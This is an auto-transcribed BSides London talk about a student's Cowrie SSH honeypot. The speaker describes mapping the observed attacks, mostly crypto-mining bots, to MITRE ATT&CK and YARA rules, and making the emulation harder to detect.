← All talks

Honeypots, I Shrunk The Data by Oscar Williamson

BSides London · 202319:34119 viewsPublished 2023-05Watch on YouTube ↗
Speakers
Show transcript [en]

hi hi everyone so I'm Oscar and today I'm just going to be talking a bit about using honey pots for threat intelligence so just to introduce myself I'm a second year cyber security student at the University of Warwick I'm also the technician for the Warwick cyber security society and that's my Twitter not that I tweet anything so so first of all given we're talking about honeypots or threat intelligence it seems to make sense to explain what a honey pot is so this is a description from Chris Sanders very good book about intrusion detection so honey pots rely on Deception to encourage attackers to interacts with them and then generate alerts so that you know you've been connected to but the difference is obviously that book I just talked about is about intrusion detection usually if you have a connection to a Honeypot a traditional thing to do is panic because that means you've got someone on your network but with threat intelligence it's exciting to us if someone connects to it because you get some valuable data so what you want to do is take these attacks encourage as many of them as possible to connect to you and get information such as IP addresses what credentials are they used to log into your server and other things like URLs Keys wallet addresses because there's a lot of crypto Etc so over the summer I worked on an open source project called threat Dash which took the pre-existing um SSH Honeypot called kauri which some of you might have heard of it basically emulates an SSH session but it doesn't actually run anything which is a key distinction and then what I did was I converted the data coming out of that stored it in a mongodb instance including the files that you see uploaded Etc and then you carry out signature analysis of it with um Yara signature detection rules foreign part was hosted on the University of Warwick public IP address which originally I tried hosting it on AWS but you get a lot less connections when you're hosting it like that presumably because at University is a targeted institution so this graph here shows the sort of attack volume you saw per day across a period about three months so the Blue Line you see there is how many connections there were but trying to log into the SSH Honeypot and then the Orange Line shows how many of those sessions actually executed commands because you saw a lot of sessions that were created someone logged in but they didn't actually run any commands so presumably just trying passwords across the internet now the question we had to ask before moving any further with this is is it really worth it to put all this effort into it because you can get a lot of valuable information just from IEP addresses and commands Etc but you can always get more information by running more detailed analytics on bins or trying to make it a Honeypot more realistic but the further you go each time it requires more effort and eventually you reach a point where you can spend weeks on one single thing that doesn't really return anything of much value so there's a trade-off between you want to maximize what the output is but you don't really want to spend too much time on it thank you so the aim of this project really was to take a data set of about 28 000 interactions and identify unique attacks so being able to look at an attack and go oh yes I recognize this from a certain attack um so first thing we used was my to attack which allows you to tag it to certain techniques but I'll admit I'm not very familiar with motor attack so trying to write it like that was quite hard I was able to identify about 19 tactics or techniques actually when about 224 exist so obviously I most likely missed some of the techniques that might to attack lists but at the same time it's not an easy thing to work with and trying to look at a set of commands being run on an assistant sh session and map it to Mito attack it's not about easy so then the way which I try to look for Unique attacks was look for Unique combinations of Mito attack techniques and using that I was able to identify 51 different attacks but when you start to drill down into that because you only have 19 possible techniques there's a lot of overlap work you saw attacks that were clearly very different being categorized under the same thing so just to give an example of this it looks at the um system information Discovery technique for micro attack where an attacker tries to get some information about the system when an attacker Alabama on the Internet is connecting to a random IP address they found that's most attacks most attacks are trying to learn something about what they've discovered so here I've got a few examples of things that came under the system information Discovery technique and as you'll see they're quite different so putting them under one technique was quite a broad fin really so it sort of attacks that tried to read um the binary for echo which is a traditional tactic used to try and identify if the system architecture is 32 or 64-bit because you can read the elf header um slash IP Cloud Print if you look that up you know that they're trying to Target a micro tick routers so okay that's a command specific to that and the Nvidia SMI command you know that the attacker is looking for information about the GPU so most likely trying to do some crypto mining so if you actually drill down into the specific commands being run not just in miter attack techniques you start to realize that you can get more about the context from it so the solution to this was rather than using miter attack I basically just took the commands and manually went through them and categorized them into unique individual fins um I tried experimenting with string similarities or things where setting a threshold in for strings are 60 are similar or something um that didn't really work out so instead I went to Yara rules and just trying to write signatures for each um possible attack because as we saw before my true attack just tells you what tactic it's been used but it doesn't give you any context so these are the rules with notes and fins you're able to identify what specific OS was being targeted what was the aim of that attack what exactly are they trying to do and also because a lot of these are automated you see um there are unique usages of certain commands for example as you see in the Yara rule on the slide there's a very specific usage of you name the u-name command with a several arguments in a very specific order and as it's automated fat attacker always used the arguments in that order so I have several rules in the data set which are just looking for you name commands but with arguments in slightly different orders or different permutations because that was able to uniquely identify an attack and the comparison there was I was able to identify as I said 51 unique attacks with Mito attack but then when I started writing these custom signatures I was able to get that up to a hundred so that started to reveal the breadth of what was actually in the data set and as I said Yara signature rules as a defined format you can also write comments add notes so reviewing it is a lot more useful so just to quickly explain what sort of things we're seeing in this day to say it turns out when you put a SSH server which anyone could log into on the internet basically people are trying to crypto mine uh at least 17 of all attacks seen and this was attacks with commands not just uh General connections explicitly did something relating to crypto that number is a massive um underestimate because there are a lot of attacks which I didn't go into in depth but they were downloading shell scripts and running it and when you start to look at those most of them are also crypto mining so what would these crypto mining attacks looking for well a big one was looking for Hive OS systems which is a um distribution specifically for crypto mining you can tell that because it's using a specific command High password or it's looking for VNC passwords.txt because apparently Hive arrest stores its VNC passwords in plain text and also a configuration file also sort of XM rig which is a miner so you can identify that by spotting the GitHub download link and there you've got another interesting indicator that you could use for fret intelligence because a lot of VM commands were you had the um wallet addresses in them so you could use that and use it to map again later and there are a lot of other different crypto miners being downloaded or looked for Etc so the other thing about honeypots is obviously as I said they rely on Deception so you have to have an attacker believe that they're real and if an attacker obviously what we've seen so far is mostly automated attacks but if you have an attacker who actually knows what they're looking for is Hands-On keyboard and starting to look around it suddenly becomes quite easy to work out if you're in a Honeypot or not so first things first if you've ever used calorie you'll know it has a default um hostname of server 04 so any attacker who knows what they're doing would see that hostname and immediately log out because they know they're in Honeypot so the very first thing you want to do is change that I think the instance I have running uses production as a hostname hopefully that seems appealing to an attacker well the other thing I mentioned is calorie emulates its command so it only knows what's programmed into it so for example a lot of attacks I saw over the summer they were looking to read the um uptime file see how long this ever been up for that didn't exist at the time in Calgary so I decided to add that because [Music] not even Dynamic I just put a file I had a number in it actually and um hopefully took some attacker that's going to make it seem a little bit more realistic because if you log into a system and you can't find proc uptime you might start to have questions about what's going on the other thing that was missing was the lspci command and that um talks about the PCI cards available on a machine so my first instinct for that was just to create a command run that command on my local machine and copy the output but the important thing as you can see in this picture here is that because I was currently doing my work in a virtual machine and that's one of the ways an attacker uses to detect virtualization so whilst that might not suggest Honeypot that might suggest to an attacker that they're in some sandboxed environment potentially hurting him off giving any information that might be useful for threat intelligence so I'd be very careful to look for a um output that didn't indicate any form of virtualization just to make it seem a little more appealing to an attacker gosh so the question at the end of all this is it Honeypot are they worth it for threat intelligence and the answer to that is if you put a box on a random IP address on the internet it probably won't be that interesting you just see a lot of botnets crypto mining Etc nothing really that new but as a sort of scene by putting it on a university IP address if you're some organization that's perhaps of interest to specific um threat groups you might start to see something more unique so if you're particularly concerned about your fret model having a honey pot for fat intelligence might be useful um the other thing is you just have to be patient it took a long time days before anything interesting came through so just to sit tight and some days you'll get loads of attacks some days you get nothing and the other thing is mostly attacks you'll see Vegas have been reported on it's very easy to take something you see be excited about him and just look it up and someone's done a really good write-up of it so that isn't it not really generating any new anything new in terms of threat intelligence but the reason I talked about it today is because it was just fun in the end like you don't really discover anything new but at the same time you get to see what's going on on the internet have your own idea of what who's scanning what Etc yeah so thank you any questions [Music] [Applause] well thank you I wish I'd had one of those at school um would you have liked to have had the opportunity to mount any of the address space not currently that in use at the University and that would obviously reduce the probability significantly would you be able to repeat the question sorry yep so assuming your university has a block of address space would you have liked the opportunity to have mounted any of the spare address space with Honeypot servers perhaps redirecting to your one and then potentially much reduce the probability and therefore see significantly more activity yeah I mean I don't I haven't really sort of thought of how in depth about in terms of the effects of the IP addresses it's um I kind of just used what I was given but I think trying to explore that more in depth would be definitely very interesting any more questions [Music] if you're putting something on the Internet um to be exploited just to kind of see what they're doing do you kind of worry uh that someone might try and use your resource that's that's hosted and used by you to uh you know let's say stage um you know in decent images or other things that potentially could come back to you oh yeah I mean that's definitely a worry that's kind of why the model behind kauri as a sort of Honeypot is that it's entirely emulation based because nothing that's run actually I guess I mean saving the files you are saving anything indecent that's uploaded Etc but not publicly so I don't think in terms of emulating if there's any particular concern there um did your Honeypot get any sort of actionable information that you were able to share during the three months that you had it running um you don't not necessarily yeah I do there is like a list of IP addresses and things I tried to sort of um exporting all that I mean there is information to be shared but nothing that isn't already out there like all these IP addresses and things are being mapped by like bigger threat intelligence um fins anyway foreign do you have any sort of future research questions or any other sort of queries that you think you'd like to answer with a similar kind of set of experiments I think the interesting thing that was considered out this was can we do the same for sort of Windows and RDP but the answer to that was also Windows is just a lot harder to work with than trying to emulate that it's a challenge so be about looking to actually sandbox a Windows environment cool thanks uh so I one of the interesting things about about it about thing ahead because when you first started I was thinking actually what's the use of how could I apply this one of the things probably because my background is more GRC a lot of a lot of things people probably struggle with is understanding the real the real value of an asset so actually I could see if you were to deploy a series of Honey pots that might indicate that someone could have access to a specific asset maybe in terms of University you'd be a research or something that's being done that can actually allow you to classify or get a real value um sort of generation of actually how much if this specific asset work what's the likelihood that someone would want to try and access this and therefore feed into your risk assessment so that I think is quite interesting um is that something you thought is that there are a lot of applications along the line of that along that kind of same line of thinking or any other applications you think could also um honeypots can be useful or yeah no definitely I think that's um I think that's the sort of point trying to make about the specific companies it might provide a specific value that obviously the context I was doing it was just um general internet facing honeypots but I can imagine it allows you to if you were to try and emulate something that you were specifically interested in like trying to emulate the characteristics of that I could give interesting information and also um a bit of idea of what's actually targeting your organization yeah definitely so because that's the sort of information you can get you can start to like tags IP addresses any other sort of indicators and so you can really build up your own sort of internal threat Intelligence on that did you try different output in lspgi so if you included a your high performance graphics card they you would see them do further commands versus disconnect please say that again so with lspci you could include a you know an Nvidia graphics card did you look at if they uh won further commands after they've found the graphics card versus not finding one and just disconnect yeah so definitely um with the commands about gpus you were often um seeing grips for certain patterns um the interesting thing I did find in terms of a lot of those um grips is that it didn't it never seemed to particularly affect what the attacker actually ran afterwards it seems a lot of collect a lot of attackers seem to collect information to store for themselves but never actually do anything but yeah I definitely um try to make the lspci look a bit more enticing with Nvidia graphics obviously by putting it on a university Network do you have any like ethical concerns had they broken out of your kind of virtual environment um not in far as the way it was um set up like I was very lucky to have a very um skilled of technician who I worked with who made sure it's a sort of very on the public IP address range but it was an isolated lab environment and it was properly firewalled et cetera so there wasn't any risk to that is that all yes yes no any more questions last call no excellent well if we want to give Oscar yes yeah yeah a round of applause